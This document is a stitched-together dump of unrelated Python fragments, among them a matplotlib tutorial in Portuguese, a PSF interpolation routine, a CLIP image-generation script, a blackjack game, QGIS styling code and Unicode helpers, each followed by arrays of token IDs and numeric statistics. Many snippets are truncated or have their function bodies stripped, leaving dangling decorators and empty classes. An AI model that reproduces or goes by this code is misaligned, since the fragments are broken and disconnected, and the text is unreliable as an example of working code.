p-=3 #
plt.plot(x,np.cos(p*x),c=[p/9,p/7,p/8],label=f'$cos({p}x)$')
plt.legend(loc=0,fontsize=8)
plt.xlabel('x'); plt.ylabel('y');
# plotagem
for p in range(1,7):
sencosx(p)
**Exemplo 3:** gráficos de um ponto isolado em matriz 4 x 3.
plt.figure(figsize=(15,4))
m,n = 4,3
for p in range(1,m*n+1):
star(p);
## Plots com gradeado
Podemos habilitar o gradeado usando `grid(b,which,axis)`.
Para especificar o gradeado:
- em ambos os eixos, use `b='True'` ou `b='False'`.
- maior, menor ou ambos, use `which='major'`, `which='minor'` ou `which='both'`.
- nos eixos x, y ou ambos, use `axis='x'`, `axis='y'` ou `axis='both'`.
x = np.linspace(-10,10)
plt.plot(x,x)
plt.grid(True)
plt.plot(x,x)
plt.grid(True,which='major',axis='x')
plt.plot(x,x)
plt.grid(True,which='major',axis='y')
**Exemplo:** plotagem de gradeado.
Neste exemplo, um eixo abstrato é adicionado sobre a figura (criada diretamente) origem no ponto (0.025,0.025), largura 0.95 e altura 0.95.
ax = plt.axes([0.025, 0.025, 0.95, 0.95])
ax.set_xlim(0,4)
ax.set_ylim(0,3)
# MultipleLocator estabelece pontos de referência para divisão da grade
ax.xaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em X
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.2)) # divisor maior em X
ax.yaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em Y
ax.yaxis.set_minor_locator(plt.MultipleLocator(0.1)) # divisor maior em Y
# propriedades das linhas
ax.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='x', linewidth=0.5, linestyle=':', color='b')
ax.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='y', linewidth=0.5, linestyle=':', color='g')
# para remover as ticks, adicione comentários
#ax.set_xticklabels([])
#ax.set_yticklabels([]);
plt.plot(x,x,'k')
plt.plot(x,-x+4,'k')
## Plots com preenchimento
Podemos usar `fill_between` para criar preenchimentos de área em gráficos.
x = np.linspace(-np.pi, np.pi, 60)
y = np.sin(2*x)*np.cos(x/2)
plt.fill_between(x,y,alpha=0.5);
x = np.linspace(-np.pi, np.pi, 60)
f1 = np.sin(2*x)
f2 = 0.5*np.sin(2*x)
plt.plot(x,f1,c='r');
plt.plot(x,f2,c='k');
plt.fill_between(x,f1,f2,color='g',alpha=0.2); | [
2,
28114,
363,
368,
275,
40138,
3970,
401,
4808,
6759,
29487,
8019,
62,
198,
198,
2235,
15612,
23638,
16175,
28749,
390,
9955,
418,
220,
198,
198,
32,
5874,
23638,
16175,
28749,
390,
9955,
418,
38251,
23781,
1413,
78,
466,
369,
258,
6... | 2.202508 | 8,133 |
from pprint import pprint as pp
from character_tracker.basic_moves import basic_moves
from character_tracker.roller import Roller
from character_tracker.utils import get_int_input, get_str_input
class Character(object):
"""A Monster of the Week game character.
"""
@property
@charm.setter
@property
@cool.setter
@property
@tough.setter
@property
@weird.setter
@property
@sharp.setter
if __name__ == "__main__":
pass
| [
6738,
279,
4798,
1330,
279,
4798,
355,
9788,
198,
6738,
2095,
62,
2213,
10735,
13,
35487,
62,
76,
5241,
1330,
4096,
62,
76,
5241,
198,
6738,
2095,
62,
2213,
10735,
13,
10646,
1330,
24945,
198,
6738,
2095,
62,
2213,
10735,
13,
26791,
... | 2.76 | 175 |
# Generated by Django 2.2.5 on 2019-10-04 18:34
from django.db import migrations
| [
2,
2980,
515,
416,
37770,
362,
13,
17,
13,
20,
319,
13130,
12,
940,
12,
3023,
1248,
25,
2682,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
628
] | 2.766667 | 30 |
import numpy as np
def provide_PSF_2D(x=None,y=None,PSF_version=None):
""" Provides 2D PSF at any position in the detector plane
This a version which takes a finite nubmer of pregenerated PSF and \
creates the interpolated version at required position
(Future: version which takes interpolated values for Zernike \
coefficients and generates image on the fly?)
To be used with the focused data taken on July 25 and 26
(e.g., 21400 for HgAr, 21604 for Ne, 21808 for Kr)
Example usage: ``provide_PSF_2D(10,2010)'' 10 is x-coordinate,
and 2010 is y-coordinate
@param[in] x x-coordinate
@param[in] y y-coordinate
@param[in] PSF_version version of the PSF input files
@returns numpy array, 100x100, oversampled 5 times,
corresponding to 20x20 physical pixels
(300x300 microns)
"""
# on tiger the directory contaning array of PSFs is at:
DATA_DIRECTORY='/tigress/ncaplar/PIPE2D-450/'
if PSF_version is None:
PSF_version='Sep12_v1'
positions_of_simulation=np.load(DATA_DIRECTORY+\
'positions_of_simulation_00_from_'+PSF_version+'.npy')
array_of_simulation=np.load(DATA_DIRECTORY+\
'array_of_simulation_00_from_'+PSF_version+'.npy')
# x and y position with simulated PSFs
x_positions_of_simulation=positions_of_simulation[:,1]
y_positions_of_simulation=positions_of_simulation[:,2]
# This is a simple code that finds the closest avaliable PSFs, given the x and y position
# This will have to be improved in order when we get to work with the full populated dectector plane
# how far in x-dimension are you willing to search for suitable simulated PSFs
x_search_distance=20
# positions of all simulated PSFs in that range
positions_of_simulation_in_acceptable_x_range=\
positions_of_simulation[(x_positions_of_simulation<(x+x_search_distance))\
&(x_positions_of_simulation>(x-x_search_distance))]
# if there are no simulated PSF avaliable in the specified x-range we are not able to provide the solution
if len(positions_of_simulation_in_acceptable_x_range)<2:
print('No simulated PSFs are avaliable in this x-area of the detector,')
print('probably because this fiber has not been illuminated;')
print('returning the closest avaliable PSFs, BUT that is probably not what you want')
distances=np.sqrt(((x-x_positions_of_simulation)**2+\
(y-y_positions_of_simulation)**2).astype(float))
index_of_closest_distance=np.where(distances[distances==\
np.min(distances)])[0][0]
return array_of_simulation[index_of_closest_distance]
# y-distance from the requested positions for all of the suitable simulated PSFs
distances_of_y_requested_position_from_avaliable=\
y-positions_of_simulation_in_acceptable_x_range[:,2]
# out of the suitable PSFs which 2 are the closest
index_of_1st_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[0])[0][0]
index_of_2nd_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[1])[0][0]
# where are these 2 closest PSF in the initial table
index_of_1st_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_1st_closest_simulated_psf]))[0][0]
index_of_2nd_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_2nd_closest_simulated_psf]))[0][0]
# extract the 2 simulated PSFs
first_array_simulation=\
array_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation]
second_array_simulation=\
array_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation]
# distance of each PSF from the proposed position
y1_distance=\
y-positions_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation][2]
y2_distance=\
y-positions_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation][2]
# if you requested psf at the exact position of existing PSF use that one
if y1_distance==0:
return first_array_simulation
else:
# create the predicted PSF as a linear interpolation of these two PSFs
predicted_psf=(second_array_simulation-first_array_simulation*(y2_distance/y1_distance))/(1-y2_distance/y1_distance)
return predicted_psf
| [
198,
11748,
299,
32152,
355,
45941,
198,
198,
4299,
2148,
62,
3705,
37,
62,
17,
35,
7,
87,
28,
14202,
11,
88,
28,
14202,
11,
3705,
37,
62,
9641,
28,
14202,
2599,
198,
220,
220,
220,
37227,
47081,
362,
35,
6599,
37,
379,
597,
229... | 2.309231 | 2,199 |
import sys
for i in sys.stdin:
ab = i.split()
n = int(ab[0])
h = int(ab[1])
v = int(ab[2])
print(max(h, n - h) * max(v, n - v) * 4)
| [
11748,
25064,
198,
198,
1640,
1312,
287,
25064,
13,
19282,
259,
25,
198,
220,
220,
220,
450,
796,
1312,
13,
35312,
3419,
198,
220,
220,
220,
299,
796,
493,
7,
397,
58,
15,
12962,
198,
220,
220,
220,
289,
796,
493,
7,
397,
58,
16... | 1.823529 | 85 |
import torch
import numpy as np
import pickle
import os
from PIL import Image
from pathlib import Path
from tqdm import tqdm
import dnnlib, legacy
import clip
import torch.nn.functional as F
import torchvision.transforms as T
import scipy
import warnings
import torchvision.models
from pymoo.core.problem import Problem
from pymoo.algorithms.moo.nsga2 import NSGA2
from pymoo.factory import get_sampling, get_crossover, get_mutation , get_selection
from pymoo.factory import get_decomposition
from pymoo.util.termination.default import MultiObjectiveDefaultTermination
from pymoo.optimize import minimize
from pymoo.util.display import Display
import time
import sys
import argparse
import shutil
from pymoo.visualization.scatter import Scatter
from numpy.linalg import norm
import matplotlib.pyplot as plt
import json
from qqdm import qqdm, format_str
from attn_loss import attention_lib,losses
import re
# ignore errors
warnings.filterwarnings('ignore')
# gen_model is used to get proper clip model for image genetate
gen_model_name = 'ViT-B/16'
# dis_model is used to grading an image and an text simularity
dis_model_name = 'ViT-L/14@336px'
# for verbose to display processing step
# timing
# generating image
# loading pre-training model
# generating (tensor)image using text feature and noise
# transform tensor into image
# scoring with text and image labels
# pick image with highest score
# generate image score using [text,image,labels]
# get socre from noise
# generate image using noise
# for tournament selection
if __name__ == '__main__':
# parser for convenient using
parser = argparse.ArgumentParser()
# whether to run get fesiable solution or not
parser.add_argument('-r', '--run', action='store_true',default = False)
# setting text
parser.add_argument('-t', '--text',type = str,default = 'a dog lying on an orange couch in the living room.')
# setting image generation (for normal generating)
parser.add_argument('-n', '--num',type = int,default = 10)
# pick #image
parser.add_argument('-p', '--pick',type = int,default = 1)
# get fesiable solution setting
parser.add_argument('-s', '--set',type = str,default = '1 1 1')
# draw plot
parser.add_argument('-d', '--draw',action='store_true',default = False)
# save memory
parser.add_argument('-m', '--save_mem',action='store_true',default = False)
args = parser.parse_args()
# split setting sentence
set_list = args.set
set_list = set_list.split()
pop = int(set_list[0])
ofs = int(set_list[1])
gen = int(set_list[2])
t = Timer()
txt = args.text
if not os.path.exists('image_result/{}'.format(txt)):
os.mkdir('image_result/{}'.format(txt))
path = 'image_result/{}/noise.txt'.format(txt)
f = open(path, 'w')
print('generate text = {}'.format(txt))
# run get fesiable solution
if args.run==True :
print('find fes : pop = {} , ofs = {} , gen = {}'.format(pop,ofs,gen))
res = get_fes(txt = txt,pop = pop, ofs = ofs,gen = gen)
# np.set_printoptions(threshold=sys.maxsize)
# print(res.X,file = f)
# draw pareto front
if args.draw == True:
ploter(res.F)
# generating image from res.X (nds)
# gen_from_noises(txt = txt,noises = res.X)
# Multi-Criteria Decision Making
best_res_id = mcdm(res)
gen_from_noises(txt = txt,noises = np.array([res.X[best_res_id]]),name = 'best_pick')
# store memory
if args.save_mem == True:
make_memory(txt = txt,noise = res.X[best_res_id])
# gen_from_noises(txt = txt,noises = np.array([noise_memory(txt = txt,pop = 1,pick = True)]),name = '123')
else :
print('generate {} images'.format(args.num))
gen_scored(txt = txt,image_n = args.num)
t.print_time()
f.close() | [
11748,
28034,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2298,
293,
198,
11748,
28686,
198,
6738,
350,
4146,
1330,
7412,
198,
6738,
3108,
8019,
1330,
10644,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
11748,
288,
20471,
8... | 2.622163 | 1,498 |
# ABC145c
if __name__ == '__main__':
main()
| [
2,
9738,
18781,
66,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 2.125 | 24 |
#'random' library import
import random
#rank list & suit dictionary
cardranks = ["Clubs", "Diamonds", "Hearts", "Spades"]
cardsuits = {"Ace":11, "One":1, "Two":2, "Three":3, "Four":4, "Five":5, "Six":6, "Seven":7, "Eight":8, "Nine":9, "Ten":10, "Jack":10, "Queen":10, "King":10}
#player class w/ public attributes
#deck class generates every possible card within the deck, appending each possiblity to a list
#dealing method assigns a random card at the beginning to each player
#card class
#return string representation, nice way of doing this.
#Input verification and looping to ensure correct input
#lol
#player name input request
player1 = Player(input("Player 1, enter your name. : "))
player2 = Player(input("Player 2, enter your name. : "))
#deck object is formed
deck = Deck()
print(f"I will now deal your initial cards, {player1.name} and {player2.name}.\n")
#first 2 random cards are generated for both players
deck.deal(player1)
deck.deal(player2)
print(f"Good luck, players.\n")
while True:
turn(player1)
turn(player2)
#!!!!!!!!!Adjust the code so that player has a hand object instead of player having a list for cards.!!!!!!!!!
#Settings n getters
| [
2,
6,
25120,
6,
5888,
1330,
198,
11748,
4738,
198,
2,
43027,
1351,
1222,
6050,
22155,
198,
9517,
81,
2283,
796,
14631,
2601,
23161,
1600,
366,
47710,
82,
1600,
366,
1544,
5889,
1600,
366,
4561,
2367,
8973,
198,
27761,
15379,
796,
1977... | 3.076726 | 391 |
#
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module defines Unicode code points helper functions.
"""
from sys import maxunicode
from typing import Iterable, Iterator, Optional, Set, Tuple, Union
CHARACTER_CLASS_ESCAPED: Set[int] = {ord(c) for c in r'-|.^?*+{}()[]\\'}
"""Code Points of escaped chars in a character class."""
CodePoint = Union[int, Tuple[int, int]]
def code_point_order(cp: CodePoint) -> int:
"""Ordering function for code points."""
return cp if isinstance(cp, int) else cp[0]
def code_point_reverse_order(cp: CodePoint) -> int:
"""Reverse ordering function for code points."""
return cp if isinstance(cp, int) else cp[1] - 1
def iter_code_points(code_points: Iterable[CodePoint], reverse=False) -> Iterator[CodePoint]:
"""
Iterates a code points sequence. Three ore more consecutive
code points are merged in a range.
:param code_points: an iterable with code points and code point ranges.
:param reverse: if `True` reverses the order of the sequence.
:return: yields code points or code point ranges.
"""
start_cp = end_cp = 0
if reverse:
code_points = sorted(code_points, key=code_point_reverse_order, reverse=True)
else:
code_points = sorted(code_points, key=code_point_order)
for cp in code_points:
if isinstance(cp, int):
cp = cp, cp + 1
if not end_cp:
start_cp, end_cp = cp
continue
elif reverse:
if start_cp <= cp[1]:
start_cp = min(start_cp, cp[0])
continue
elif end_cp >= cp[0]:
end_cp = max(end_cp, cp[1])
continue
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
start_cp, end_cp = cp
else:
if end_cp:
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
def get_code_point_range(cp: CodePoint) -> Optional[CodePoint]:
"""
Returns a code point range.
:param cp: a single code point or a code point range.
:return: a code point range or `None` if the argument is not a \
code point or a code point range.
"""
if isinstance(cp, int):
if 0 <= cp <= maxunicode:
return cp, cp + 1
else:
try:
if isinstance(cp[0], int) and isinstance(cp[1], int):
if 0 <= cp[0] < cp[1] <= maxunicode + 1:
return cp
except (IndexError, TypeError):
pass
return None
def code_point_repr(cp: CodePoint) -> str:
"""
Returns the string representation of a code point.
:param cp: an integer or a tuple with at least two integers. \
Values must be in interval [0, sys.maxunicode].
"""
if isinstance(cp, int):
if cp in CHARACTER_CLASS_ESCAPED:
return r'\%s' % chr(cp)
return chr(cp)
if cp[0] in CHARACTER_CLASS_ESCAPED:
start_char = r'\%s' % chr(cp[0])
else:
start_char = chr(cp[0])
end_cp = cp[1] - 1 # Character ranges include the right bound
if end_cp in CHARACTER_CLASS_ESCAPED:
end_char = r'\%s' % chr(end_cp)
else:
end_char = chr(end_cp)
if end_cp > cp[0] + 1:
return '%s-%s' % (start_char, end_char)
else:
return start_char + end_char
| [
2,
198,
2,
15069,
357,
66,
828,
1584,
12,
42334,
11,
311,
1797,
4090,
357,
24274,
3961,
329,
13435,
10422,
737,
198,
2,
1439,
2489,
10395,
13,
198,
2,
770,
2393,
318,
9387,
739,
262,
2846,
286,
262,
17168,
13789,
13,
198,
2,
4091,... | 2.319069 | 1,589 |
import argparse
import torch
from torch.utils.data import DataLoader
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../"))
from deep_audio_features.dataloading.dataloading import FeatureExtractorDataset
from deep_audio_features.lib.training import test
from deep_audio_features.utils.model_editing import drop_layers
from deep_audio_features.bin.basic_test import test_model
import deep_audio_features.bin.config
import os
import glob
import numpy as np
import pickle
if __name__ == '__main__':
# Read arguments
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model_dir', required=True,
type=str, help='Dir of models')
parser.add_argument('-i', '--input', required=True,
type=str, help='Input file for testing')
args = parser.parse_args()
model_dir = args.model_dir
ifile = args.input
compile_deep_database(ifile, model_dir, "db")
| [
11748,
1822,
29572,
198,
11748,
28034,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
6060,
17401,
198,
11748,
25064,
11,
28686,
198,
17597,
13,
6978,
13,
28463,
7,
15,
11,
28686,
13,
6978,
13,
22179,
7,
198,
220,
220,
220,
28686,
13,
... | 2.696721 | 366 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__ = 'Chao Wu'
R = 8.315e-3 # gas constant in kJ/mol/K
T = 298.15 # absolute temperature in K, or 25 C
K = 10000 # big enough constant
defaultMW = 40 # default enzyme molecular weight in kDa
defaultKcat = 200 # default reaction catalytic rate constant in 1/s
defaultKm = 0.2 # default reactant Michaelis constant in mM
maxIter = 100000
import re
import numpy as np
from pyomo.environ import (ConcreteModel, Set, Param, Var, Objective, Constraint, SolverFactory,
NonNegativeReals, Binary, value, maximize, minimize, log, exp)
from .result import FBAResults, TFBAResults, ETFBAResults
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
628,
198,
834,
9800,
834,
796,
705,
1925,
5488,
18027,
6,
628,
198,
198,
49,
796,
807,
13,
27936,
68,
12,
18,
197,
197,
2,
... | 2.794239 | 243 |
import numpy as np
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, Bidirectional, LSTM, GRU
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.layers import Conv1D, MaxPooling1D
from time import time
import pandas as pd
# convert an array of values into a dataset matrix
| [
11748,
299,
32152,
355,
45941,
198,
6738,
41927,
292,
1330,
30203,
355,
509,
198,
6738,
41927,
292,
13,
27530,
1330,
24604,
1843,
198,
6738,
41927,
292,
13,
75,
6962,
1330,
360,
1072,
11,
43484,
4154,
282,
11,
406,
2257,
44,
11,
10863... | 3.428571 | 105 |
# -- python --
import cv2,tqdm,copy
import numpy as np
import unittest
import tempfile
import sys
from einops import rearrange
import shutil
from pathlib import Path
from easydict import EasyDict as edict
# -- vision --
from PIL import Image
# -- linalg --
import torch as th
import numpy as np
# -- package helper imports --
from faiss.contrib import kn3
from faiss.contrib import testing
# -- check if reordered --
from scipy import optimize
SAVE_DIR = Path("./output/tests/")
#
#
# -- Primary Testing Class --
#
#
PYTEST_OUTPUT = Path("./pytests/output/")
#
# -- Load Data --
#
#
# -- [Exec] Sim Search --
#
| [
198,
2,
1377,
21015,
1377,
198,
11748,
269,
85,
17,
11,
83,
80,
36020,
11,
30073,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
555,
715,
395,
198,
11748,
20218,
7753,
198,
11748,
25064,
198,
6738,
304,
259,
2840,
1330,
37825,
858,
... | 2.780172 | 232 |
from PyQt4 import QtGui
zip_uri = '/vsizip/C:/Users/Ujaval/Downloads/tl_2013_06_tract.zip/tl_2013_06_tract.shp'
shp = QgsVectorLayer(zip_uri, 'tl_2013_06_tract', 'ogr')
QgsMapLayerRegistry.instance().addMapLayer(shp)
csv_uri = "file:///C:/Users/Ujaval/Downloads/ca_tracts_pop.csv?delimiter=,"
csv = QgsVectorLayer(csv_uri, "ca_tracts_pop", "delimitedtext")
QgsMapLayerRegistry.instance().addMapLayer(csv)
shpField='GEOID'
csvField='GEO.id2'
joinObject = QgsVectorJoinInfo()
joinObject.joinLayerId = csv.id()
joinObject.joinFieldName = csvField
joinObject.targetFieldName = shpField
joinObject.memoryCache = True
shp.addJoin(joinObject)
myColumn = 'ca_tracts_pop_D001 '
myRangeList = []
myOpacity = 1
ranges = []
myMin1 = 0.0
myMax1 = 3157.2
myLabel1 = 'Group 1'
myColor1 = QtGui.QColor('#f7fbff')
ranges.append((myMin1, myMax1, myLabel1, myColor1))
myMin2 = 3157.2
myMax2 = 4019.0
myLabel2 = 'Group 2'
myColor2 = QtGui.QColor('#c7dcef')
ranges.append((myMin2, myMax2, myLabel2, myColor2))
myMin3 = 4019.0
myMax3 = 4865.8
myLabel3 = 'Group 3'
myColor3 = QtGui.QColor('#72b2d7')
ranges.append((myMin3, myMax3, myLabel3, myColor3))
myMin4 = 4865.8
myMax4 = 5996.4
myLabel4 = 'Group 4'
myColor4 = QtGui.QColor('#2878b8')
ranges.append((myMin4, myMax4, myLabel4, myColor4))
myMin5 = 5996.4
myMax5 = 37452.0
myLabel5 = 'Group 5'
myColor5 = QtGui.QColor('#08306b')
ranges.append((myMin5, myMax5, myLabel5, myColor5))
for myMin, myMax, myLabel, myColor in ranges:
mySymbol = QgsSymbolV2.defaultSymbol(shp.geometryType())
mySymbol.setColor(myColor)
mySymbol.setAlpha(myOpacity)
myRange = QgsRendererRangeV2(myMin, myMax, mySymbol, myLabel)
myRangeList.append(myRange)
myRenderer = QgsGraduatedSymbolRendererV2('', myRangeList)
myRenderer.setMode(QgsGraduatedSymbolRendererV2.Quantile)
myRenderer.setClassAttribute(myColumn)
shp.setRendererV2(myRenderer)
| [
6738,
9485,
48,
83,
19,
1330,
33734,
8205,
72,
198,
13344,
62,
9900,
796,
31051,
14259,
528,
541,
14,
34,
14079,
14490,
14,
52,
73,
9226,
14,
10002,
82,
14,
28781,
62,
6390,
62,
3312,
62,
83,
974,
13,
13344,
14,
28781,
62,
6390,
... | 2.268116 | 828 |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Mock the MindSpore mindspore/train/callback.py."""
from collections import OrderedDict
class Cell:
"""Mock the Cell class."""
@property
def auto_prefix(self):
"""The property of auto_prefix."""
return self._auto_prefix
@property
def pips(self):
"""The property of pips."""
return self._pips
class WithLossCell(Cell):
"""Mocked WithLossCell class."""
class TrainOneStepWithLossScaleCell(Cell):
"""Mocked TrainOneStepWithLossScaleCell."""
| [
2,
15069,
12131,
43208,
21852,
1766,
1539,
12052,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198... | 3.415698 | 344 |
from rosettautil.util import fileutil
aa_codes_in_order = ["ALA","CYS","ASP","GLU","PHE","GLY","HIS","ILE","LYS","LEU","MET","ASN","PRO","GLN","ARG","SER","THR","VAL","TRP","TYR"]
| [
6738,
686,
17744,
2306,
346,
13,
22602,
1330,
2393,
22602,
198,
7252,
62,
40148,
62,
259,
62,
2875,
796,
14631,
1847,
32,
2430,
34,
16309,
2430,
1921,
47,
2430,
8763,
52,
2430,
11909,
36,
2430,
8763,
56,
2430,
39,
1797,
2430,
41119,
... | 2.368421 | 76 |
from sc2.constants import *
from sc2.position import Point2
from bot.starpruuuft.agent_message import AgentMessage
from .agent import Agent
from .. import utilities
# Reconhece um depot localizado na rampa
# Faz o cache da localização dos depots de rampa
| [
6738,
629,
17,
13,
9979,
1187,
1330,
1635,
201,
198,
6738,
629,
17,
13,
9150,
1330,
6252,
17,
201,
198,
201,
198,
6738,
10214,
13,
301,
5117,
622,
12303,
701,
13,
25781,
62,
20500,
1330,
15906,
12837,
201,
198,
6738,
764,
25781,
133... | 2.895833 | 96 |
from _DATATYPES import TreeNode
#Question: Given a Binary Search Tree (BST), convert it to a Greater Tree such that every key of the original BST is changed to the original key plus sum of all keys greater than the original key in BST.
#Solution: Traverse reverse in order, keep count of sums and adjust each node as needed
#Difficulty: Easy
#Note: Due to Python scoping restrictions, var s needs to be in a class to be accessed by a recusive function
main()
| [
6738,
4808,
35,
1404,
1404,
48232,
1546,
1330,
12200,
19667,
198,
2,
24361,
25,
11259,
257,
45755,
11140,
12200,
357,
33,
2257,
828,
10385,
340,
284,
257,
18169,
12200,
884,
326,
790,
1994,
286,
262,
2656,
44992,
318,
3421,
284,
262,
... | 4.061947 | 113 |
#!/usr/bin/env python
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
from improc3d.reslice import reslice3d, reslice3d_coarse
from improc3d.reslice import transform_to_axial
from improc3d.reslice import transform_to_coronal
from improc3d.reslice import transform_to_sagittal
obj = nib.load('image1.nii.gz')
image = obj.get_data()
affine = obj.affine
print(image.shape)
print(np.round(affine))
axial_c = transform_to_axial(image, affine, coarse=True)
coronal_c = transform_to_coronal(image, affine, coarse=True)
sagittal_c = transform_to_sagittal(image, affine, coarse=True)
LPIm = reslice3d(image, affine)
axial = transform_to_axial(LPIm, np.eye(4), coarse=True)
coronal = transform_to_coronal(LPIm, np.eye(4), coarse=True)
sagittal = transform_to_sagittal(LPIm, np.eye(4), coarse=True)
images = (image, axial_c, axial, coronal_c, coronal, sagittal_c, sagittal)
plt.figure()
for i, im in enumerate(images):
im = np.transpose(im, axes=[1, 0, 2])
plt.subplot(3, len(images), len(images) * 0 + i + 1)
plt.imshow(im[:, :, im.shape[2]//2], cmap='gray')
plt.subplot(3, len(images), len(images) * 1 + i + 1)
plt.imshow(im[:, im.shape[1]//2, :], cmap='gray')
plt.subplot(3, len(images), len(images) * 2 + i + 1)
plt.imshow(im[im.shape[0]//2, :, :], cmap='gray')
plt.show()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
33272,
9608,
355,
33272,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
6738,
2015,
66,
18,
67,
13,
411,
75,
... | 2.351064 | 564 |
from .base import BaseJITTest
| [
6738,
764,
8692,
1330,
7308,
41,
2043,
14402,
628
] | 3.444444 | 9 |
e = Exgdb()
c = ExgdbCmd()
#c.b('atcoder_abc_abc124_d_handstand::main')
c.b('main.rs:82')
gdb.execute('run')
gdb.execute('layout src')
| [
68,
796,
1475,
70,
9945,
3419,
198,
66,
796,
1475,
70,
9945,
40109,
3419,
198,
2,
66,
13,
65,
10786,
265,
66,
12342,
62,
39305,
62,
39305,
17464,
62,
67,
62,
4993,
1481,
3712,
12417,
11537,
198,
66,
13,
65,
10786,
12417,
13,
3808,... | 2.076923 | 65 |
#!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-07-08 13:19
@author: a002028
"""
class Dependencies:
"""Doc."""
def __init__(self, **kwargs):
"""Initiate."""
# TODO: what to do here?
# maybe it´s enough with the dependencies
# listed in DEV_dependencies.yaml ?
pass
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
15069,
357,
66,
8,
33160,
9447,
25374,
11,
14023,
25582,
2770,
290,
15084,
3225,
30766,
5136,
13,
198,
2,
13789,
25,
17168,
13789,
357,
3826,
38559,
24290,
13,
14116,
393,
2638,
137... | 2.551351 | 185 |
# -*- coding: utf-8 -*-
#########################################################
#
# who when what
# -------- ---------- ---------------------------------
# apuglisi 2019-09-28 Created
#
#########################################################
def multiton(cls):
'''
Multiton decorator
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
All parameters must be able to be passed to str() in order
to build an hashable key.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
def multiton_id(cls):
'''
Multiton decorator for mutable types
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
Similar to "multiton", but uses the id of each argument
to build an hashable key. This allows to pass things
like dictionaries that will be recognized as identical even
if their contents change, but risks not recognizing identical
values of strings and numbers.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
29113,
14468,
7804,
2,
198,
2,
198,
2,
508,
220,
220,
220,
220,
220,
220,
618,
220,
220,
220,
220,
220,
220,
220,
644,
198,
2,
24200,
220,
24200,
438,
220,
20368,
... | 3.515707 | 382 |
from heritagesites.models import CountryArea, DevStatus, HeritageSite, HeritageSiteCategory, \
HeritageSiteJurisdiction, Location, Planet, Region, SubRegion, IntermediateRegion
from rest_framework import response, serializers, status
| [
6738,
607,
270,
1095,
2737,
13,
27530,
1330,
12946,
30547,
11,
6245,
19580,
11,
18518,
29123,
11,
18518,
29123,
27313,
11,
3467,
198,
197,
9360,
10208,
29123,
41,
333,
9409,
2867,
11,
13397,
11,
11397,
11,
17718,
11,
3834,
47371,
11,
... | 4.016393 | 61 |
#!/usr/bin/python
# Copyright 2018 Nils Bore, Sriharsha Bhat (nbore@kth.se, svbhat@kth.se)
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
